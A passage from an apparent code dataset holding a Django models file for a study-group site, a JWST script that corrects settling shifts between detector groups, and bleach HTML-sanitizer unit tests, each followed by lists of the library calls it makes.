((1621, 1653), 'PIL.Image.fromarray', 'Image.fromarray', (['segmented_image'], {}), '(segmented_image)\n', (1636, 1653), False, 'from PIL import Image, ImageStat\n'), ((1680, 1709), 'PIL.Image.merge', 'Image.merge', (['"""RGB"""', '(r, g, b)'], {}), "('RGB', (r, g, b))\n", (1691, 1709), False, 'from PIL import Image, ImageStat\n'), ((1845, 1865), 'cv2.imread', 'cv2.imread', (['tempfile'], {}), '(tempfile)\n', (1855, 1865), False, 'import cv2\n')]
|
from colorful.fields import RGBColorField
from django.db import models
from django.contrib.auth.models import User
from datetime import date
from django.urls import reverse
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
github = models.URLField(verbose_name="GitHub", blank=True, default="")
telegram_nick = models.TextField(verbose_name="Telegram", blank=True, default="")
discord_nick = models.TextField(verbose_name="Discord", blank=True, default="")
tags = models.ManyToManyField("Tag")
bio = models.TextField(
"Sobre você",
default="",
help_text="Descreva sobre você para os amiginhos poderem te conhecer melhor!!",
)
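    # Portuguese strings above: "Sobre você" = "About you"; help_text = "Describe yourself so your pals can get to know you better!!"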
def __str__(self):
return "{} {}".format(self.user.first_name, self.user.last_name)
def __repr__(self):
return "{} {}".format(self.user.first_name, self.user.last_name)
class Meta:
verbose_name = "Perfil"
verbose_name_plural = "Perfis"
class StudyRoom(models.Model):
group_name = models.CharField("Nome do grupo", max_length=500, blank=False)
telegram_group = models.URLField(verbose_name="Telegram", blank=True, default="")
discord_group = models.URLField(verbose_name="Discord", blank=True, default="")
# users_group = models.ManyToManyField("Profile")
tags_group = models.ManyToManyField("Tag")
limit_date = models.DateField(verbose_name="Data expiracao do Grupo", default=date.today)
def __str__(self):
return self.group_name
def __repr__(self):
return self.group_name
def get_absolute_url(self):
return reverse('create-group', kwargs={'pk': self.pk})
class Tag(models.Model):
name = models.CharField("Tag", max_length=100, default="", blank=False)
color = RGBColorField()
def __str__(self):
return self.name
def __repr__(self):
return self.name
|
[
"django.db.models.OneToOneField",
"django.db.models.TextField",
"django.db.models.ManyToManyField",
"django.db.models.URLField",
"colorful.fields.RGBColorField",
"django.db.models.CharField",
"django.urls.reverse",
"django.db.models.DateField"
] |
[((215, 267), 'django.db.models.OneToOneField', 'models.OneToOneField', (['User'], {'on_delete': 'models.CASCADE'}), '(User, on_delete=models.CASCADE)\n', (235, 267), False, 'from django.db import models\n'), ((281, 343), 'django.db.models.URLField', 'models.URLField', ([], {'verbose_name': '"""GitHub"""', 'blank': '(True)', 'default': '""""""'}), "(verbose_name='GitHub', blank=True, default='')\n", (296, 343), False, 'from django.db import models\n'), ((364, 429), 'django.db.models.TextField', 'models.TextField', ([], {'verbose_name': '"""Telegram"""', 'blank': '(True)', 'default': '""""""'}), "(verbose_name='Telegram', blank=True, default='')\n", (380, 429), False, 'from django.db import models\n'), ((449, 513), 'django.db.models.TextField', 'models.TextField', ([], {'verbose_name': '"""Discord"""', 'blank': '(True)', 'default': '""""""'}), "(verbose_name='Discord', blank=True, default='')\n", (465, 513), False, 'from django.db import models\n'), ((525, 554), 'django.db.models.ManyToManyField', 'models.ManyToManyField', (['"""Tag"""'], {}), "('Tag')\n", (547, 554), False, 'from django.db import models\n'), ((565, 692), 'django.db.models.TextField', 'models.TextField', (['"""Sobre você"""'], {'default': '""""""', 'help_text': '"""Descreva sobre você para os amiginhos poderem te conhecer melhor!!"""'}), "('Sobre você', default='', help_text=\n 'Descreva sobre você para os amiginhos poderem te conhecer melhor!!')\n", (581, 692), False, 'from django.db import models\n'), ((1052, 1114), 'django.db.models.CharField', 'models.CharField', (['"""Nome do grupo"""'], {'max_length': '(500)', 'blank': '(False)'}), "('Nome do grupo', max_length=500, blank=False)\n", (1068, 1114), False, 'from django.db import models\n'), ((1136, 1200), 'django.db.models.URLField', 'models.URLField', ([], {'verbose_name': '"""Telegram"""', 'blank': '(True)', 'default': '""""""'}), "(verbose_name='Telegram', blank=True, default='')\n", (1151, 1200), False, 'from django.db import models\n'), ((1221, 1284), 'django.db.models.URLField', 'models.URLField', ([], {'verbose_name': '"""Discord"""', 'blank': '(True)', 'default': '""""""'}), "(verbose_name='Discord', blank=True, default='')\n", (1236, 1284), False, 'from django.db import models\n'), ((1356, 1385), 'django.db.models.ManyToManyField', 'models.ManyToManyField', (['"""Tag"""'], {}), "('Tag')\n", (1378, 1385), False, 'from django.db import models\n'), ((1403, 1479), 'django.db.models.DateField', 'models.DateField', ([], {'verbose_name': '"""Data expiracao do Grupo"""', 'default': 'date.today'}), "(verbose_name='Data expiracao do Grupo', default=date.today)\n", (1419, 1479), False, 'from django.db import models\n'), ((1725, 1789), 'django.db.models.CharField', 'models.CharField', (['"""Tag"""'], {'max_length': '(100)', 'default': '""""""', 'blank': '(False)'}), "('Tag', max_length=100, default='', blank=False)\n", (1741, 1789), False, 'from django.db import models\n'), ((1802, 1817), 'colorful.fields.RGBColorField', 'RGBColorField', ([], {}), '()\n', (1815, 1817), False, 'from colorful.fields import RGBColorField\n'), ((1639, 1686), 'django.urls.reverse', 'reverse', (['"""create-group"""'], {'kwargs': "{'pk': self.pk}"}), "('create-group', kwargs={'pk': self.pk})\n", (1646, 1686), False, 'from django.urls import reverse\n')]
|
#!/usr/bin/env python
#
# fix_settling_shifts.py
#
# Author: <NAME>, STScI, February 2022
#
# Script to fix shifts between groups introduced by the settling issue.
#
# Input arguments:
# required: image filename (single "uncal.fits" file)
# optional: boxpeaksize (box size for searching central peak; default=20 pixels)
# optional: boxfitsize (box size for fitting central peak; default=200 pixels)
#
# Output: Level-2 calibrated file ("cal.fits" file)
#
#
# Example of how to run it - from the unix command line:
#
# $ fix_settling_shifts.py jw01143001001_02101_00001_nrcalong_uncal.fits
#
# which produces:
# jw01143001001_02101_00001_nrcalong_cal.fits
import argparse, os, sys
from glob import glob
import astropy
from astropy.io import ascii as asc
from astropy.io import fits
from astropy import stats
from astropy import nddata
from astropy.nddata import block_reduce
from astropy.modeling import models, fitting
import jwst
from jwst.pipeline import calwebb_detector1
from jwst.pipeline import Detector1Pipeline
from jwst.pipeline import Image2Pipeline
from jwst.jump import JumpStep
from jwst.ramp_fitting import RampFitStep
from jwst.gain_scale import GainScaleStep
import scipy
from scipy.ndimage import gaussian_filter, median_filter
from scipy import signal
import numpy as np
def crosscorfit(data_template,data_to_be_shifted,corrboxpeak,corrboxfit):
#
corr = scipy.signal.fftconvolve(data_template,data_to_be_shifted[::-1,::-1],mode='same')
#
xcen,ycen = int(float(corr.shape[0])/2.),int(float(corr.shape[1])/2.)
#
box2 = int(float(corrboxpeak)/2.)
#
ypeak,xpeak = np.unravel_index(np.argmax(corr[ycen-box2:ycen+box2,xcen-box2:xcen+box2]),(corrboxpeak,corrboxpeak))
#
x0,y0 = xcen-box2+xpeak,ycen-box2+ypeak
#
ampl = corr[y0,x0]
#
x_stddev0,y_stddev0 = 2.,2.
#
corrboxfit2 = float(corrboxfit)/2.
#
x1,y1 = xcen-int(corrboxfit2),ycen-int(corrboxfit2)
x2,y2 = x1+corrboxfit,y1+corrboxfit
#
corr_fit = corr[y1:y2,x1:x2]
#
x0fit,y0fit = x0-x1,y0-y1
#
y_array_2d,x_array_2d = np.mgrid[:corrboxfit,:corrboxfit]
#
gfit_init = models.Gaussian2D(amplitude=ampl,x_mean=x0fit,y_mean=y0fit,x_stddev=x_stddev0,y_stddev=y_stddev0,theta=0.)
gfit_init.theta.fixed = True
#
gfit_model = fitting.LevMarLSQFitter()
gfit_results = gfit_model(gfit_init,x_array_2d,y_array_2d,corr_fit)
#
amplfit = gfit_results.amplitude.value
thetafit = gfit_results.theta.value
xfit,yfit = gfit_results.x_mean.value,gfit_results.y_mean.value
xsigma,ysigma = gfit_results.x_stddev.value,gfit_results.y_stddev.value
dx,dy = xfit-corrboxfit2,yfit-corrboxfit2
#
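    # NOTE: uncalfile, ni and ng below are read from the enclosing __main__ scope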
print('fit1 results: %s %3i %3i %5i %5i %8.3f %8.3f %8.3f %8.3f %14.1f %14.1f %8.3f %8.3f %8.3f' % (uncalfile,ni+1,ng+1,x0fit,y0fit,xfit,yfit,dx,dy,ampl,amplfit,thetafit,xsigma,ysigma))
#
#
sigma_new = np.min([xsigma,ysigma])
#
gfit_init2 = models.Gaussian2D(amplitude=ampl,x_mean=x0fit,y_mean=y0fit,x_stddev=sigma_new,y_stddev=sigma_new,theta=0.)
gfit_init2.x_stddev.fixed = True
gfit_init2.y_stddev.fixed = True
gfit_init2.theta.fixed = True
#
gfit_model2 = fitting.LevMarLSQFitter()
gfit_results2 = gfit_model2(gfit_init2,x_array_2d,y_array_2d,corr_fit)
#
amplfit = gfit_results2.amplitude.value
thetafit = gfit_results2.theta.value
xfit,yfit = gfit_results2.x_mean.value,gfit_results2.y_mean.value
xsigma,ysigma = gfit_results2.x_stddev.value,gfit_results2.y_stddev.value
dx,dy = xfit-corrboxfit2,yfit-corrboxfit2
#
print('fit2 results: %s %3i %3i %5i %5i %8.3f %8.3f %8.3f %8.3f %14.1f %14.1f %8.3f %8.3f %8.3f' % (uncalfile,ni+1,ng+1,x0fit,y0fit,xfit,yfit,dx,dy,ampl,amplfit,thetafit,xsigma,ysigma))
#
if ((xpeak in [0,corrboxpeak]) or (ypeak in [0,corrboxpeak])): exit_need_adjustment('xpeak, ypeak = '+repr(xpeak)+', '+repr(ypeak)+'; corrboxpeak = '+repr(corrboxpeak))
if ((xsigma > box2) or (ysigma > box2)): exit_need_adjustment('xsigma, ysigma = '+repr(xsigma)+', '+repr(ysigma)+'; box2 = '+repr(box2))
#
return dx,dy
def apply_shift(data_to_be_shifted,dx,dy,bkgd):
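    # Shift the frame by the integer-rounded (dx, dy), padding the exposed border with bkgd.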
#
dxi,dyi = round(dx),round(dy)
#
ny,nx = data_to_be_shifted.shape
#
if (dxi >= 0):
x1old,x2old = 0,nx-dxi
x1new,x2new = dxi,nx
else:
x1old,x2old = -dxi,nx
x1new,x2new = 0,nx+dxi
#
if (dyi >= 0):
y1old,y2old = 0,ny-dyi
y1new,y2new = dyi,ny
else:
y1old,y2old = -dyi,ny
y1new,y2new = 0,ny+dyi
#
data_to_be_shifted_new = np.full(data_to_be_shifted.shape,bkgd,dtype=np.float32)
data_to_be_shifted_new[y1new:y2new,x1new:x2new] = data_to_be_shifted[y1old:y2old,x1old:x2old]
#
return data_to_be_shifted_new
def exit_need_adjustment(err_info):
#
print('''
***
*** ERROR - The code has encountered potentially problematic results, and is therefore exiting.
***''')
print(' *** Error info is: ',err_info)
print(''' ***
***
*** Please contact the author (<NAME>) to discuss how to run it on this dataset.
***
''')
sys.exit()
if __name__ == '__main__':
#
print('''
*** -----------------------------------------------------------------------------------
***
*** fix_settling_shifts.py
***
*** Author: <NAME>, STScI, February 2022
***
    *** Script to fix shifts between groups introduced by the settling issue.
***
*** Input arguments:
*** required: image filename (single "uncal.fits" file)
*** optional: boxpeaksize (box size for searching central peak; default=20 pixels)
*** optional: boxfitsize (box size for fitting central peak; default=200 pixels)
***
*** Output: Level-2 calibrated file ("cal.fits" file)
***
***
*** Example of how to run it - from the unix command line:
***
*** $ fix_settling_shifts.py jw01143001001_02101_00001_nrcalong_uncal.fits
***
*** which produces:
*** jw01143001001_02101_00001_nrcalong_cal.fits
***
*** -----------------------------------------------------------------------------------
''')
#
    parser = argparse.ArgumentParser(description='Fix shifts between groups introduced by the settling issue.')
parser.add_argument('image', default='NONE', type=str, help='Input uncal.fits filename')
parser.add_argument('-bp','--boxpeaksize',default=20, type=int, help='Box size for searching central peak')
parser.add_argument('-bf','--boxfitsize',default=200, type=int, help='Box size for fitting central peak')
#
options = parser.parse_args()
uncalfile = options.image
corrboxpeak = options.boxpeaksize
corrboxfit = options.boxfitsize
#
parameter_dict = {'jump': {'skip': True},
'ramp_fit': {'skip': True},
'gain_scale': {'skip': True}}
#
rampfile = uncalfile.replace('_uncal.fits', '_ramp.fits')
#
if (not os.path.exists(rampfile)):
rampdata = calwebb_detector1.Detector1Pipeline.call(uncalfile, steps=parameter_dict, save_results=True)
#
hdr0 = fits.getheader(uncalfile,0)
n_ints = hdr0['NINTS']
n_grps_per_int = hdr0['NGROUPS']
#
data = fits.getdata(uncalfile,1)
#
ramp_cube_aligned = np.zeros(data.shape).astype(np.float32)
#
first_group = True
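    #
    # For each group of each integration: form the difference image against the
    # previous group, cross-correlate it with the first group's template, and
    # accumulate the shifted differences into an aligned ramp cube.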
for ni in range(n_ints):
#
for ng in range(n_grps_per_int):
#
if (ng != 0): data_intgrp_prev = data_intgrp
#
data_intgrp = fits.getdata(rampfile,1)[ni,ng,:,:]
#
if (ng == 0):
#
data_diff = data_intgrp
#
else:
#
data_diff = data_intgrp - data_intgrp_prev
#
mean,med,rms = stats.sigma_clipped_stats(data_diff, maxiters=10, sigma_lower=6., sigma_upper=4)
#
print('n_int = ',ni+1,'; n_grp = ',ng+1,'; mean, med, rms = ',mean,med,rms)
#
data_diff_med = scipy.ndimage.median_filter(input=data_diff, size=3, mode='constant', cval=0.)
#
data_diff_sub = data_diff_med - med
#
data_diff_sub[np.where(data_diff_sub < (5.*rms))] = 0.
#
data_diff_sub_gauss = gaussian_filter(data_diff_sub, sigma=1.0, truncate=5., order=0, mode='constant', cval=0.).astype(np.float32)
#
if (first_group):
#
first_group = False
#
group_template = data_diff_sub_gauss
#
ramp_cube_aligned[0,0,:,:] = data_diff
#
else:
#
dx,dy = crosscorfit(group_template,data_diff_sub_gauss,corrboxpeak,corrboxfit)
#
data_diff_sub_gauss_shifted = apply_shift(data_diff_sub_gauss,dx,dy,0.)
#
dx_check,dy_check = crosscorfit(group_template,data_diff_sub_gauss_shifted,corrboxpeak,corrboxfit)
#
print('shift results: %s %3i %3i %5i %5i %8.3f %8.3f %8.3f %8.3f' % (uncalfile,ni+1,ng+1,round(dx),round(dy),dx,dy,dx_check,dy_check))
#
data_diff_shifted = apply_shift(data_diff,dx,dy,med)
#
if (ng == 0):
#
ramp_cube_aligned[ni,ng,:,:] = data_diff_shifted
#
else:
#
ramp_cube_aligned[ni,ng,:,:] = ramp_cube_aligned[ni,ng-1,:,:] + data_diff_shifted
rampfile_aligned = rampfile[:-10] + '_aligned_ramp.fits'
#
a = os.system('/bin/rm -f '+rampfile_aligned)
a = os.system('/bin/cp -p '+rampfile+' '+rampfile_aligned)
#
f = fits.open(rampfile_aligned,'update')
#
f[1].data = ramp_cube_aligned
#
f.flush()
f.close()
#
caldetector1_output_jumpstep = JumpStep.call(rampfile_aligned, save_results=False)
caldetector1_output_rampfit = RampFitStep.call(caldetector1_output_jumpstep, save_results=False)
caldetector1_output_gainscale0 = GainScaleStep.call(caldetector1_output_rampfit[0], save_results=False)
caldetector1_output_gainscale1 = GainScaleStep.call(caldetector1_output_rampfit[1], save_results=False)
#
calimage2_output0 = Image2Pipeline.call(caldetector1_output_gainscale0, save_results=True)
calimage2_output1 = Image2Pipeline.call(caldetector1_output_gainscale1, save_results=True)
|
[
"argparse.ArgumentParser",
"numpy.argmax",
"astropy.stats.sigma_clipped_stats",
"jwst.ramp_fitting.RampFitStep.call",
"scipy.signal.fftconvolve",
"scipy.ndimage.median_filter",
"numpy.full",
"jwst.pipeline.calwebb_detector1.Detector1Pipeline.call",
"jwst.pipeline.Image2Pipeline.call",
"astropy.io.fits.getdata",
"scipy.ndimage.gaussian_filter",
"os.path.exists",
"os.system",
"numpy.min",
"astropy.io.fits.open",
"jwst.gain_scale.GainScaleStep.call",
"sys.exit",
"astropy.modeling.models.Gaussian2D",
"jwst.jump.JumpStep.call",
"numpy.zeros",
"astropy.io.fits.getheader",
"astropy.modeling.fitting.LevMarLSQFitter",
"numpy.where"
] |
[((1422, 1510), 'scipy.signal.fftconvolve', 'scipy.signal.fftconvolve', (['data_template', 'data_to_be_shifted[::-1, ::-1]'], {'mode': '"""same"""'}), "(data_template, data_to_be_shifted[::-1, ::-1],\n mode='same')\n", (1446, 1510), False, 'import scipy\n'), ((2132, 2249), 'astropy.modeling.models.Gaussian2D', 'models.Gaussian2D', ([], {'amplitude': 'ampl', 'x_mean': 'x0fit', 'y_mean': 'y0fit', 'x_stddev': 'x_stddev0', 'y_stddev': 'y_stddev0', 'theta': '(0.0)'}), '(amplitude=ampl, x_mean=x0fit, y_mean=y0fit, x_stddev=\n x_stddev0, y_stddev=y_stddev0, theta=0.0)\n', (2149, 2249), False, 'from astropy.modeling import models, fitting\n'), ((2291, 2316), 'astropy.modeling.fitting.LevMarLSQFitter', 'fitting.LevMarLSQFitter', ([], {}), '()\n', (2314, 2316), False, 'from astropy.modeling import models, fitting\n'), ((2871, 2895), 'numpy.min', 'np.min', (['[xsigma, ysigma]'], {}), '([xsigma, ysigma])\n', (2877, 2895), True, 'import numpy as np\n'), ((2914, 3031), 'astropy.modeling.models.Gaussian2D', 'models.Gaussian2D', ([], {'amplitude': 'ampl', 'x_mean': 'x0fit', 'y_mean': 'y0fit', 'x_stddev': 'sigma_new', 'y_stddev': 'sigma_new', 'theta': '(0.0)'}), '(amplitude=ampl, x_mean=x0fit, y_mean=y0fit, x_stddev=\n sigma_new, y_stddev=sigma_new, theta=0.0)\n', (2931, 3031), False, 'from astropy.modeling import models, fitting\n'), ((3145, 3170), 'astropy.modeling.fitting.LevMarLSQFitter', 'fitting.LevMarLSQFitter', ([], {}), '()\n', (3168, 3170), False, 'from astropy.modeling import models, fitting\n'), ((4472, 4529), 'numpy.full', 'np.full', (['data_to_be_shifted.shape', 'bkgd'], {'dtype': 'np.float32'}), '(data_to_be_shifted.shape, bkgd, dtype=np.float32)\n', (4479, 4529), True, 'import numpy as np\n'), ((4993, 5003), 'sys.exit', 'sys.exit', ([], {}), '()\n', (5001, 5003), False, 'import argparse, os, sys\n'), ((6005, 6104), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Fix shifts between groups introduced by settling issue."""'}), "(description=\n 'Fix shifts between groups introduced by settling issue.')\n", (6028, 6104), False, 'import argparse, os, sys\n'), ((6927, 6955), 'astropy.io.fits.getheader', 'fits.getheader', (['uncalfile', '(0)'], {}), '(uncalfile, 0)\n', (6941, 6955), False, 'from astropy.io import fits\n'), ((7036, 7062), 'astropy.io.fits.getdata', 'fits.getdata', (['uncalfile', '(1)'], {}), '(uncalfile, 1)\n', (7048, 7062), False, 'from astropy.io import fits\n'), ((9114, 9157), 'os.system', 'os.system', (["('/bin/rm -f ' + rampfile_aligned)"], {}), "('/bin/rm -f ' + rampfile_aligned)\n", (9123, 9157), False, 'import argparse, os, sys\n'), ((9162, 9222), 'os.system', 'os.system', (["('/bin/cp -p ' + rampfile + ' ' + rampfile_aligned)"], {}), "('/bin/cp -p ' + rampfile + ' ' + rampfile_aligned)\n", (9171, 9222), False, 'import argparse, os, sys\n'), ((9227, 9264), 'astropy.io.fits.open', 'fits.open', (['rampfile_aligned', '"""update"""'], {}), "(rampfile_aligned, 'update')\n", (9236, 9264), False, 'from astropy.io import fits\n'), ((9367, 9418), 'jwst.jump.JumpStep.call', 'JumpStep.call', (['rampfile_aligned'], {'save_results': '(False)'}), '(rampfile_aligned, save_results=False)\n', (9380, 9418), False, 'from jwst.jump import JumpStep\n'), ((9473, 9539), 'jwst.ramp_fitting.RampFitStep.call', 'RampFitStep.call', (['caldetector1_output_jumpstep'], {'save_results': '(False)'}), '(caldetector1_output_jumpstep, save_results=False)\n', (9489, 9539), False, 'from jwst.ramp_fitting import RampFitStep\n'), ((9579, 9649), 'jwst.gain_scale.GainScaleStep.call', 
'GainScaleStep.call', (['caldetector1_output_rampfit[0]'], {'save_results': '(False)'}), '(caldetector1_output_rampfit[0], save_results=False)\n', (9597, 9649), False, 'from jwst.gain_scale import GainScaleStep\n'), ((9685, 9755), 'jwst.gain_scale.GainScaleStep.call', 'GainScaleStep.call', (['caldetector1_output_rampfit[1]'], {'save_results': '(False)'}), '(caldetector1_output_rampfit[1], save_results=False)\n', (9703, 9755), False, 'from jwst.gain_scale import GainScaleStep\n'), ((9782, 9852), 'jwst.pipeline.Image2Pipeline.call', 'Image2Pipeline.call', (['caldetector1_output_gainscale0'], {'save_results': '(True)'}), '(caldetector1_output_gainscale0, save_results=True)\n', (9801, 9852), False, 'from jwst.pipeline import Image2Pipeline\n'), ((9875, 9945), 'jwst.pipeline.Image2Pipeline.call', 'Image2Pipeline.call', (['caldetector1_output_gainscale1'], {'save_results': '(True)'}), '(caldetector1_output_gainscale1, save_results=True)\n', (9894, 9945), False, 'from jwst.pipeline import Image2Pipeline\n'), ((1657, 1722), 'numpy.argmax', 'np.argmax', (['corr[ycen - box2:ycen + box2, xcen - box2:xcen + box2]'], {}), '(corr[ycen - box2:ycen + box2, xcen - box2:xcen + box2])\n', (1666, 1722), True, 'import numpy as np\n'), ((6779, 6803), 'os.path.exists', 'os.path.exists', (['rampfile'], {}), '(rampfile)\n', (6793, 6803), False, 'import argparse, os, sys\n'), ((6821, 6917), 'jwst.pipeline.calwebb_detector1.Detector1Pipeline.call', 'calwebb_detector1.Detector1Pipeline.call', (['uncalfile'], {'steps': 'parameter_dict', 'save_results': '(True)'}), '(uncalfile, steps=parameter_dict,\n save_results=True)\n', (6861, 6917), False, 'from jwst.pipeline import calwebb_detector1\n'), ((7088, 7108), 'numpy.zeros', 'np.zeros', (['data.shape'], {}), '(data.shape)\n', (7096, 7108), True, 'import numpy as np\n'), ((7530, 7615), 'astropy.stats.sigma_clipped_stats', 'stats.sigma_clipped_stats', (['data_diff'], {'maxiters': '(10)', 'sigma_lower': '(6.0)', 'sigma_upper': '(4)'}), '(data_diff, maxiters=10, sigma_lower=6.0,\n sigma_upper=4)\n', (7555, 7615), False, 'from astropy import stats\n'), ((7733, 7812), 'scipy.ndimage.median_filter', 'scipy.ndimage.median_filter', ([], {'input': 'data_diff', 'size': '(3)', 'mode': '"""constant"""', 'cval': '(0.0)'}), "(input=data_diff, size=3, mode='constant', cval=0.0)\n", (7760, 7812), False, 'import scipy\n'), ((7312, 7337), 'astropy.io.fits.getdata', 'fits.getdata', (['rampfile', '(1)'], {}), '(rampfile, 1)\n', (7324, 7337), False, 'from astropy.io import fits\n'), ((7890, 7925), 'numpy.where', 'np.where', (['(data_diff_sub < 5.0 * rms)'], {}), '(data_diff_sub < 5.0 * rms)\n', (7898, 7925), True, 'import numpy as np\n'), ((7967, 8063), 'scipy.ndimage.gaussian_filter', 'gaussian_filter', (['data_diff_sub'], {'sigma': '(1.0)', 'truncate': '(5.0)', 'order': '(0)', 'mode': '"""constant"""', 'cval': '(0.0)'}), "(data_diff_sub, sigma=1.0, truncate=5.0, order=0, mode=\n 'constant', cval=0.0)\n", (7982, 8063), False, 'from scipy.ndimage import gaussian_filter, median_filter\n')]
|
import html5lib
from nose.tools import eq_
import bleach
def test_empty():
eq_('', bleach.clean(''))
def test_comments_only():
comment = '<!-- this is a comment -->'
open_comment = '<!-- this is an open comment'
eq_('', bleach.clean(comment))
eq_('', bleach.clean(open_comment))
eq_(comment, bleach.clean(comment, strip_comments=False))
eq_('%s-->' % open_comment, bleach.clean(open_comment,
strip_comments=False))
def test_with_comments():
html = '<!-- comment -->Just text'
eq_('Just text', bleach.clean(html))
eq_(html, bleach.clean(html, strip_comments=False))
def test_no_html():
eq_('no html string', bleach.clean('no html string'))
def test_allowed_html():
eq_('an <strong>allowed</strong> tag',
bleach.clean('an <strong>allowed</strong> tag'))
eq_('another <em>good</em> tag',
bleach.clean('another <em>good</em> tag'))
def test_bad_html():
eq_('a <em>fixed tag</em>',
bleach.clean('a <em>fixed tag'))
def test_function_arguments():
TAGS = ['span', 'br']
ATTRS = {'span': ['style']}
eq_('a <br><span style="">test</span>',
bleach.clean('a <br/><span style="color:red">test</span>',
tags=TAGS, attributes=ATTRS))
def test_named_arguments():
ATTRS = {'a': ['rel', 'href']}
s = u'<a href="http://xx.com" rel="alternate">xx.com</a>'
eq_('<a href="http://xx.com">xx.com</a>', bleach.clean(s))
eq_(s, bleach.clean(s, attributes=ATTRS))
def test_disallowed_html():
eq_('a <script>safe()</script> test',
bleach.clean('a <script>safe()</script> test'))
eq_('a <style>body{}</style> test',
bleach.clean('a <style>body{}</style> test'))
def test_bad_href():
eq_('<em>no link</em>',
bleach.clean('<em href="fail">no link</em>'))
def test_bare_entities():
eq_('an & entity', bleach.clean('an & entity'))
eq_('an < entity', bleach.clean('an < entity'))
eq_('tag < <em>and</em> entity',
bleach.clean('tag < <em>and</em> entity'))
eq_('&', bleach.clean('&'))
def test_escaped_entities():
s = u'<em>strong</em>'
eq_(s, bleach.clean(s))
def test_serializer():
s = u'<table></table>'
eq_(s, bleach.clean(s, tags=['table']))
eq_(u'test<table></table>', bleach.linkify(u'<table>test</table>'))
eq_(u'<p>test</p>', bleach.clean(u'<p>test</p>', tags=['p']))
def test_no_href_links():
s = u'<a name="anchor">x</a>'
eq_(s, bleach.linkify(s))
eq_(s, bleach.linkify(s, nofollow=False))
def test_weird_strings():
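    # html5lib parses '</3' as a bogus comment, so clean() drops it entirely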
s = '</3'
eq_(bleach.clean(s), '')
def test_xml_render():
parser = html5lib.HTMLParser()
eq_(bleach._render(parser.parseFragment('')), '')
def test_stripping():
eq_('a test <em>with</em> <b>html</b> tags',
bleach.clean('a test <em>with</em> <b>html</b> tags', strip=True))
eq_('a test <em>with</em> <b>html</b> tags',
bleach.clean('a test <em>with</em> <img src="http://example.com/"> '
'<b>html</b> tags', strip=True))
s = '<p><a href="http://example.com/">link text</a></p>'
eq_('<p>link text</p>', bleach.clean(s, tags=['p'], strip=True))
s = '<p><span>multiply <span>nested <span>text</span></span></span></p>'
eq_('<p>multiply nested text</p>', bleach.clean(s, tags=['p'], strip=True))
s = ('<p><a href="http://example.com/"><img src="http://example.com/">'
'</a></p>')
eq_('<p><a href="http://example.com/"></a></p>',
bleach.clean(s, tags=['p', 'a'], strip=True))
def test_allowed_styles():
ATTR = ['style']
STYLE = ['color']
blank = '<b style=""></b>'
s = '<b style="color: blue;"></b>'
eq_(blank, bleach.clean('<b style="top:0"></b>', attributes=ATTR))
eq_(s, bleach.clean(s, attributes=ATTR, styles=STYLE))
eq_(s, bleach.clean('<b style="top: 0; color: blue;"></b>',
attributes=ATTR, styles=STYLE))
def test_idempotent():
"""Make sure that applying the filter twice doesn't change anything."""
dirty = u'<span>invalid & </span> < extra http://link.com<em>'
clean = bleach.clean(dirty)
eq_(clean, bleach.clean(clean))
linked = bleach.linkify(dirty)
eq_(linked, bleach.linkify(linked))
def test_lowercase_html():
"""We should output lowercase HTML."""
dirty = u'<EM CLASS="FOO">BAR</EM>'
clean = u'<em class="FOO">BAR</em>'
eq_(clean, bleach.clean(dirty, attributes=['class']))
def test_wildcard_attributes():
ATTR = {
'*': ['id'],
'img': ['src'],
}
TAG = ['img', 'em']
dirty = (u'both <em id="foo" style="color: black">can</em> have '
u'<img id="bar" src="foo"/>')
clean = u'both <em id="foo">can</em> have <img id="bar" src="foo">'
eq_(clean, bleach.clean(dirty, tags=TAG, attributes=ATTR))
def test_sarcasm():
"""Jokes should crash.<sarcasm/>"""
dirty = u'Yeah right <sarcasm/>'
clean = u'Yeah right <sarcasm/>'
eq_(clean, bleach.clean(dirty))
|
[
"bleach.linkify",
"bleach.clean",
"html5lib.HTMLParser"
] |
[((2738, 2759), 'html5lib.HTMLParser', 'html5lib.HTMLParser', ([], {}), '()\n', (2757, 2759), False, 'import html5lib\n'), ((4204, 4223), 'bleach.clean', 'bleach.clean', (['dirty'], {}), '(dirty)\n', (4216, 4223), False, 'import bleach\n'), ((4274, 4295), 'bleach.linkify', 'bleach.linkify', (['dirty'], {}), '(dirty)\n', (4288, 4295), False, 'import bleach\n'), ((90, 106), 'bleach.clean', 'bleach.clean', (['""""""'], {}), "('')\n", (102, 106), False, 'import bleach\n'), ((241, 262), 'bleach.clean', 'bleach.clean', (['comment'], {}), '(comment)\n', (253, 262), False, 'import bleach\n'), ((276, 302), 'bleach.clean', 'bleach.clean', (['open_comment'], {}), '(open_comment)\n', (288, 302), False, 'import bleach\n'), ((321, 364), 'bleach.clean', 'bleach.clean', (['comment'], {'strip_comments': '(False)'}), '(comment, strip_comments=False)\n', (333, 364), False, 'import bleach\n'), ((398, 446), 'bleach.clean', 'bleach.clean', (['open_comment'], {'strip_comments': '(False)'}), '(open_comment, strip_comments=False)\n', (410, 446), False, 'import bleach\n'), ((581, 599), 'bleach.clean', 'bleach.clean', (['html'], {}), '(html)\n', (593, 599), False, 'import bleach\n'), ((615, 655), 'bleach.clean', 'bleach.clean', (['html'], {'strip_comments': '(False)'}), '(html, strip_comments=False)\n', (627, 655), False, 'import bleach\n'), ((705, 735), 'bleach.clean', 'bleach.clean', (['"""no html string"""'], {}), "('no html string')\n", (717, 735), False, 'import bleach\n'), ((815, 862), 'bleach.clean', 'bleach.clean', (['"""an <strong>allowed</strong> tag"""'], {}), "('an <strong>allowed</strong> tag')\n", (827, 862), False, 'import bleach\n'), ((909, 950), 'bleach.clean', 'bleach.clean', (['"""another <em>good</em> tag"""'], {}), "('another <em>good</em> tag')\n", (921, 950), False, 'import bleach\n'), ((1015, 1046), 'bleach.clean', 'bleach.clean', (['"""a <em>fixed tag"""'], {}), "('a <em>fixed tag')\n", (1027, 1046), False, 'import bleach\n'), ((1192, 1283), 'bleach.clean', 'bleach.clean', (['"""a <br/><span style="color:red">test</span>"""'], {'tags': 'TAGS', 'attributes': 'ATTRS'}), '(\'a <br/><span style="color:red">test</span>\', tags=TAGS,\n attributes=ATTRS)\n', (1204, 1283), False, 'import bleach\n'), ((1475, 1490), 'bleach.clean', 'bleach.clean', (['s'], {}), '(s)\n', (1487, 1490), False, 'import bleach\n'), ((1503, 1536), 'bleach.clean', 'bleach.clean', (['s'], {'attributes': 'ATTRS'}), '(s, attributes=ATTRS)\n', (1515, 1536), False, 'import bleach\n'), ((1630, 1676), 